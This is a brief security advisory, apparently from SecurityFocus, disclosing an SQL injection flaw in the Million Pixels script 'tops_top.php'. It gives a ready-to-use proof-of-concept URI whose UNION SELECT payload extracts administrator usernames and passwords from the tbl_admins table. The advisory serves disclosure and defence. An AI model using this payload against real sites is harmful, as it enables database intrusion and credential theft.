Million Pixels 'tops_top.php' SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following proof-of-concept URI is available:

http://www.example.com/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*


 

Privacy Statement
Copyright 2010, SecurityFocus